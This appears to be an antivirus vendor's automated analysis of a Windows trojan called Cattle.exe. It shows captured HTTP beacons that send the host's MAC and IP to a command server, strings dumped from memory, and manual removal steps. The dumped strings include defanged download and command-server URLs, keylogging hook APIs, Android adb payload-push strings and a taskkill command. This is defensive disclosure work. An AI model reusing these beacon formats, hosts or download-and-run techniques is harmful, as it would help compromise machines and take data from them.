2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a95/gHbcC4GpNQ3 Tprub/0qNmMz6EuD7Cg5
inGUJPrRG1ClRSFTzMFAEeqUxqf27BGiNZi64DKJkdCYX9TpG9uMD4Lptj4WXAs bfBiT1
frx9VPKf8j9WkIkNe1I5ALdTC853zptdWa5CuLWMJel0Z2iy/UtuZhx3gHo4aZnsQ 
<<< skipped >>>


GET /txt/First_20150519.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 185696
Last-Modified: Tue, 19 May 2015 04:05:51 GMT
Connection: close
ETag: "555ab69f-2d560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJrPpIprWhJ2tPlAWn5 TjuztACdIRySqDk4MSimn
Tp7Za1Le92vuezrOyB4j/JVkCCgW5ce60uh313VwRVQB2SErOAjo8XcQ2WTk w36cDu4SJ
AaYIwk4/xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH32nMDkPr o8n05oDilNe
9ohcLeJfUZLUAxjJhcXsCVRzZRGqugj1TL1tXZUFbwHFHnTppb1vpUZub8fxolpGyp5vx/
GiWkbKmJMRiA8G3nBa2Pi04AYpQX6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI W
vHDXnxMFqqR8/kuGsSG23HxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrgxx16VQkub/E2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr9VHGe2k 9RJcWz6ytVaQ5/E2s0NmUj5azE4dSQE
6hF3aV6mEpZjZPX2q/qmcTWzkmR2fA/LXFaCxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWi8
kaOaFmzJl6VALS5kB2H8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWBrfwq59iIOLC0tZfeza
JwrE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8Ta
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSP
lrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>


GET /txt/listbc_20151106222121.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=528D1A231BC2A6FDDAB37F9BE32D5F93 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:33 GMT
Content-Type: text/plain
Content-Length: 981316
Last-Modified: Fri, 06 Nov 2015 14:21:22 GMT
Connection: close
ETag: "563cb762-ef944"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLCpCw//ZtlXeqL0Oq8hXmhS1dbIAT
I0j4H7hDmNhxfqBCuL8cMOpsqNVzNxLIKG5qZSBSuCn5fx0f5/ 1gVd/aPP9SOom WIpKo
hgOc l04FPz0GxiLEfhYTCxM4/qK98WfgaoYEWng/qVMRYJchKrjV27X9yjCsrj/nl7eyO
l1GODLoPv9LNgJfCygIPvfQmf9Yasux9OxPN4R8Qn8NqxFalNvYESg2EtfHr7qnITxIETL
kPSHK/J7NMbXnIvNHRyM4KOTUbl1IC4k7gkoWb2hooyOsK5E3V 3nLwnD/jdjjV9VvGoip
s7HiZZ7YpDZ0vb6ilBLhvc7kX6 lesXzT6wd3jt6gSOucIAP3AppOCQFLnZiT96Kv ERmY
8pUqO75F3fxKwsZxZX08DnNfkCje6 IpytI1JqNdmE0ulS19g2FokFVFNhu9B MRI0rv1T
ZZqup5rKw7rq9cL2R7QL6w ffUtPl9E53YRfnIoPPhpwmxXZ68c6AzqLD/xO2/dVGEIC67
1vaGohXFr S644o0iHKKw1Naj7KPLwTvcIsrO2 3QjGij9Vgih1ZzWMaq7OnX4EM2fUJjB
/3b/jVCIu263OFJR9eWl1wZehrcaQnMZEEjgeZvuc1YJE9t2ctzG332utSBEuw04QgLrvW
9oaiGQ2s4RSCXYkeTMIGFnVTEBg036c88SGDCftSG8n5DjNv4Uen03mn8I8vBO9wiys7Jc
4v/zYZvkpBKinkhtiwZadfgQzZ9QmMrFe huETw2Vr0RuTs Y6Bbbs7cMiCJ4EoQ/DLIvF
bwzR02aH9CcpjNB3YSiQv9k83nwMCytatubl57h/kw7k tEZ0CLLBenWWV3745fWYk2s7t
8bZ/NJsvnyku5NNfvVhIV/YOVE9gxgkT23Zy3MbQ7iYzErPcsmJ6HScuGiYesj0B4xlHjN
xqq6DTrmKtEQlEb7gGIas6RGauP1vWaua48/9zYD9ICXJ4ENgI/IsXv58pLuTTX71aY9BH
iIyyaJYJE9t2ctzG0ADeVWoFMJw3aGCG39/O Dmin1S89u Ag/xciG6s92SqqLnTP0Y6h0
taGu Eiv44BPcQ1vqgkBt6nb/eyVqJW7T2xoy2CTrJhj30bEi6UmXENleioU6zhjNrVu1/
rdLIHidULQgw4/OY8vBO9wiys7ea/ixrWbXHS7ZuZVM5xCTw jKk SLSSdw062PGxKZU2P
aahO6Lc7qM2u9iEC5DZKSRMLkfCDzYge3s7/Ba78SUZq4/W9Zq5r5D9yfW ufdob7sixSP
g5M0Zq4/W9Zq5rUX5yXwB 1/9gkT23Zy3MbfS0dnBMwsSQJ6HScuGiYes2z53ycDjwMPfW
jfpAjdmZnJCGKbiAAVZIZpQP5BcrAsKg9VYCq5CbZir9ebxZqgVYLhY7ig9a6lvcrHt96Z
1JpY9ReulnBfleVTvCunHEXPnyku5NNfvVcfP7aaDPJ00l6fTdDKJcBM0eReDfMeDa
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

Cattle.exe_3444:

`.rsrc
t.hP4S
t.hd:S
tWSShW
tl9_ tgSSh
u$SShe
@ SSHPWj
j%XtL9E
tAHt.HHt
t'SShl
<SShG
SSSSh`
FTCP
FtPW
SSh@B
CNotSupportedException
CHttpFile
hXXp://
kernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
RegOpenKeyTransactedA
Advapi32.dll
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
RegDeleteKeyExA
user32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
MFCLink_UrlPrefix
MFCLink_Url
Shell32.dll
%s:%x:%x:%x:%x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
&%d %s
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
ShowCmd
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
%sPane-%d%x
%sPane-%d
%c%d%c%s
RGB(%d, %d, %d)
%sBasePane-%d%x
%sBasePane-%d
windows
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
KEYS_MENU
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
code %d bits %d->%d
gen_codes: max_code %d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
-.zip
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-1.1.3
1.1.3
%s%s%s
Correct password required
1.2.8
zerr=%d Z_STREAM_END=%d total_out=%lu
entryCount=%d
x-xx-xxxx-xxxx
XXXXXXXXXXX
%d(lo-client:%s%d)
%d(%s)
%s%s/
cannot open '%s': %s
cannot stat '%s': %s
skipping special file '%s'
cannot read '%s': %s
error seeking in file '%s'
could not allocate buffer for '%s'
error reading from file: '%s'
file '%s' is not a valid zip file
AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
failed to copy '%s' to '%s': %s
%spush: %s -> %s
%d file%s pushed. %d file%s skipped.
error: %s
%s/%s
hXXp://app.miaoxia8.com/driver/
c:\windows\temp
%s\%s
DPInst.exe
\DPInst.exe
xm32.zip
xm64.zip
ua32.zip
ua64.zip
:%d: %s
0xX,
can't find '%s' to install
can't install '%s' because it's not a file
shell:am start -n %s
shell:input keyevent 3
/data/local/tmp/%s
/sdcard/tmp/%s
--key
host-serial:%s:%s
%s:%s
ANDROID_ADB_SERVER_PORT
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
VID:%s
Zip EOCD: expected >= %d bytes, found %d
EOCD(%d)   comment(%d) exceeds len (%d)
Archive spanning not supported
protocol fault (status x x x x?!)
host:transport:%s
transport-usb
transport-local
transport-any
host:%s
TscServer.exe
Windows
PID:%s
127.0.0.1
taskkill /f /im %s
%s\adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
?MAC=%s&PID=%s
adb.ini
APPURL
/TscServer.exe
ShellRun%s/%s
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
InternalGetTcpTable2
transport
XXXXXX
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
c:\app\Call.pdb
.PAVCFileException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCInternetException@@
.?AVCHttpFile@@
.PAVCOleException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
c:\windows\temp\Cattle.exe
06/02/2011
000000000000
Keyboard
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
1000_1234
PeekNamedPipe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
Reporte_Dispatch
RegQueryInfoKeyA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteA
UrlUnescapeA
URLDownloadToFileA
GetAsyncKeyState
MapVirtualKeyA
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
GetKeyNameTextA
UnhookWindowsHookEx
MapVirtualKeyExA
GetKeyboardLayout
GetKeyboardState
HttpQueryInfoA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetOpenUrlA
2;%SK
`#T##.#.WA3#-3&<<
.QICN,-6[?-`#=#10$  F   .t33?-W7P53R--33 #.51; #13 5;-[3-M?-36#M->- a051?-#3 ..#
 $###$-1?
2 (;%(10
$,0(,$($,000 ,$ $
.text
`.rdata
@.data
.rsrc
@.reloc
.iLiw-Z
 41;.Hx
,"G.Ar#_
.zCN,-6[(
`.rdml>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
adbWinpi.dll
ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
gdiplus.dll
IMM32.dll
IPHLPAPI.DLL
MSIMG32.dll
OLEACC.dll
OLEAUT32.dll
SETUPAPI.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
@WININET.DLL
accKeyboardShortcut
hhctrl.ocx
dwmapi.dll
UxTheme.dll
USER32.DLL
NRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
manufacturer:%s
product name:%s
version:%s
serial number:%s
last wake-up event:%s
uuid:x-xx-xxxx-xxxx
sku number:%s
family:%s

Cattle.exe_3444_rwx_00401000_001FB000:

t.hP4S
t.hd:S
tWSShW
tl9_ tgSSh
u$SShe
@ SSHPWj
j%XtL9E
tAHt.HHt
t'SShl
<SShG
SSSSh`
FTCP
FtPW
SSh@B
CNotSupportedException
CHttpFile
hXXp://
kernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
RegOpenKeyTransactedA
Advapi32.dll
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
RegDeleteKeyExA
user32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
MFCLink_UrlPrefix
MFCLink_Url
Shell32.dll
%s:%x:%x:%x:%x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
&%d %s
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
ShowCmd
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
%sPane-%d%x
%sPane-%d
%c%d%c%s
RGB(%d, %d, %d)
%sBasePane-%d%x
%sBasePane-%d
windows
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
KEYS_MENU
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
code %d bits %d->%d
gen_codes: max_code %d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
-.zip
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-1.1.3
1.1.3
%s%s%s
Correct password required
1.2.8
zerr=%d Z_STREAM_END=%d total_out=%lu
entryCount=%d
x-xx-xxxx-xxxx
XXXXXXXXXXX
%d(lo-client:%s%d)
%d(%s)
%s%s/
cannot open '%s': %s
cannot stat '%s': %s
skipping special file '%s'
cannot read '%s': %s
error seeking in file '%s'
could not allocate buffer for '%s'
error reading from file: '%s'
file '%s' is not a valid zip file
AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
failed to copy '%s' to '%s': %s
%spush: %s -> %s
%d file%s pushed. %d file%s skipped.
error: %s
%s/%s
hXXp://app.miaoxia8.com/driver/
c:\windows\temp
%s\%s
DPInst.exe
\DPInst.exe
xm32.zip
xm64.zip
ua32.zip
ua64.zip
:%d: %s
0xX,
can't find '%s' to install
can't install '%s' because it's not a file
shell:am start -n %s
shell:input keyevent 3
/data/local/tmp/%s
/sdcard/tmp/%s
--key
host-serial:%s:%s
%s:%s
ANDROID_ADB_SERVER_PORT
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
VID:%s
Zip EOCD: expected >= %d bytes, found %d
EOCD(%d)   comment(%d) exceeds len (%d)
Archive spanning not supported
protocol fault (status x x x x?!)
host:transport:%s
transport-usb
transport-local
transport-any
host:%s
TscServer.exe
Windows
PID:%s
127.0.0.1
taskkill /f /im %s
%s\adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
?MAC=%s&PID=%s
adb.ini
APPURL
/TscServer.exe
ShellRun%s/%s
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
InternalGetTcpTable2
transport
XXXXXX
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
c:\app\Call.pdb
.PAVCFileException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCInternetException@@
.?AVCHttpFile@@
.PAVCOleException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
c:\windows\temp\Cattle.exe
06/02/2011
000000000000
Keyboard
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
1000_1234
PeekNamedPipe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
Reporte_Dispatch
RegQueryInfoKeyA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteA
UrlUnescapeA
URLDownloadToFileA
GetAsyncKeyState
MapVirtualKeyA
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
GetKeyNameTextA
UnhookWindowsHookEx
MapVirtualKeyExA
GetKeyboardLayout
GetKeyboardState
HttpQueryInfoA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetOpenUrlA
2;%SK
`#T##.#.WA3#-3&<<
.QICN,-6[?-`#=#10$  F   .t33?-W7P53R--33 #.51; #13 5;-[3-M?-36#M->- a051?-#3 ..#
 $###$-1?
2 (;%(10
$,0(,$($,000 ,$ $
.text
`.rdata
@.data
.rsrc
@.reloc
.iLiw-Z
 41;.Hx
,"G.Ar#_
.zCN,-6[(
@WININET.DLL
accKeyboardShortcut
hhctrl.ocx
KERNEL32.DLL
dwmapi.dll
UxTheme.dll
USER32.DLL
NRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
manufacturer:%s
product name:%s
version:%s
serial number:%s
last wake-up event:%s
uuid:x-xx-xxxx-xxxx
sku number:%s
family:%s

Cattle.exe_3444_rwx_10018000_0002F000:

%F*>#
kN]%X
: L.xx_
Tf.rh
%CTyN(
.Qzpmz
Uexe
.Ru-]
BuFtp>
.QZ`s

Explorer.EXE_1572_rwx_00EF0000_00005000:

%WinDir%\HpE\wow64\rebuild.exe
%Program Files%\tango3\tango3.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW

Explorer.EXE_1572_rwx_00FF0000_00004000:

%System%\LQdhJ\yYJSx.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nvsvc32.exe:2544
    hdptlk.exe:2556
    ndis500.exe:2916
    yYJSx.exe:1976
    appmon.exe:3368
    %original file name%.exe:228
    MiniIE.exe:2752
    ndsqp.exe:2956
    tray.exe:3316
    traytp.exe:452
    ndislib.exe:3296

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\HpE\wow64\configWord.cf (676 bytes)
    %WinDir%\HpE\wow64\rebuild.exe (8147 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\hotkey[1].txt (676 bytes)
    %System%\cBLK.dll (2341 bytes)
    %System%\clk.ini (186 bytes)
    %WinDir%\HpE\wow64\DProEx.sys (1176 bytes)
    %WinDir%\HpE\wow64\reTcp.sys (588 bytes)
    %WinDir%\HpE\wow64\config.ini (98 bytes)
    %WinDir%\HpE\sys32\weblog.log (263 bytes)
    %WinDir%\HpE\sys32\m0gtv9N (3809 bytes)
    %WinDir%\HpE\sys32\xp28p2U.sys (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\evaqocv.txt (17 bytes)
    %System%\tl.dat (13 bytes)
    %System%\bc.dat (3808 bytes)
    %System%\tl.txt (1444 bytes)
    %WinDir%\HpE\First.txt (23220 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\yfodbgl.txt (2321 bytes)
    %WinDir%\HpE\sys32\urlnav.txt (14076 bytes)
    %System%\ndislib.exe (243 bytes)
    %WinDir%\HpE\hdptlk.exe (139 bytes)
    %WinDir%\HpE\sys32\tray.txt (221016 bytes)
    %WinDir%\HpE\wow64\nvsvc32.exe (17629 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tcueuqo.txt (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\mwgxskf.txt (673 bytes)
    %WinDir%\HpE\exec\traytp.exe (1794 bytes)
    %WinDir%\HpE\wow64\nvsvc32.txt (448324 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\lfllrdu.txt (15278 bytes)
    %WinDir%\HpE\MiniIE.txt (175005 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\przmycg.txt (673 bytes)
    %System%\ndislib.txt (40972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\sccppeu.txt (13122 bytes)
    %System%\bc.txt (127812 bytes)
    %WinDir%\HpE\MiniIE.exe (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\uwvmjte.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\mxezyyf.txt (7345 bytes)
    %WinDir%\HpE\sys32\ndis500.exe (325 bytes)
    %WinDir%\HpE\sys32\whitelist.dat (2 bytes)
    %WinDir%\HpE\sys32\urlnav.dll (83 bytes)
    %System%\appmon.exe (9606 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ihutphk.txt (1425 bytes)
    %WinDir%\HpE\sys32\tray.exe (7972 bytes)
    %WinDir%\HpE\sys32\whitelist.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\rhkqvcb.txt (26096 bytes)
    %WinDir%\HpE\sys32\ndis500.txt (55748 bytes)
    %System%\lhc.txt (32148 bytes)
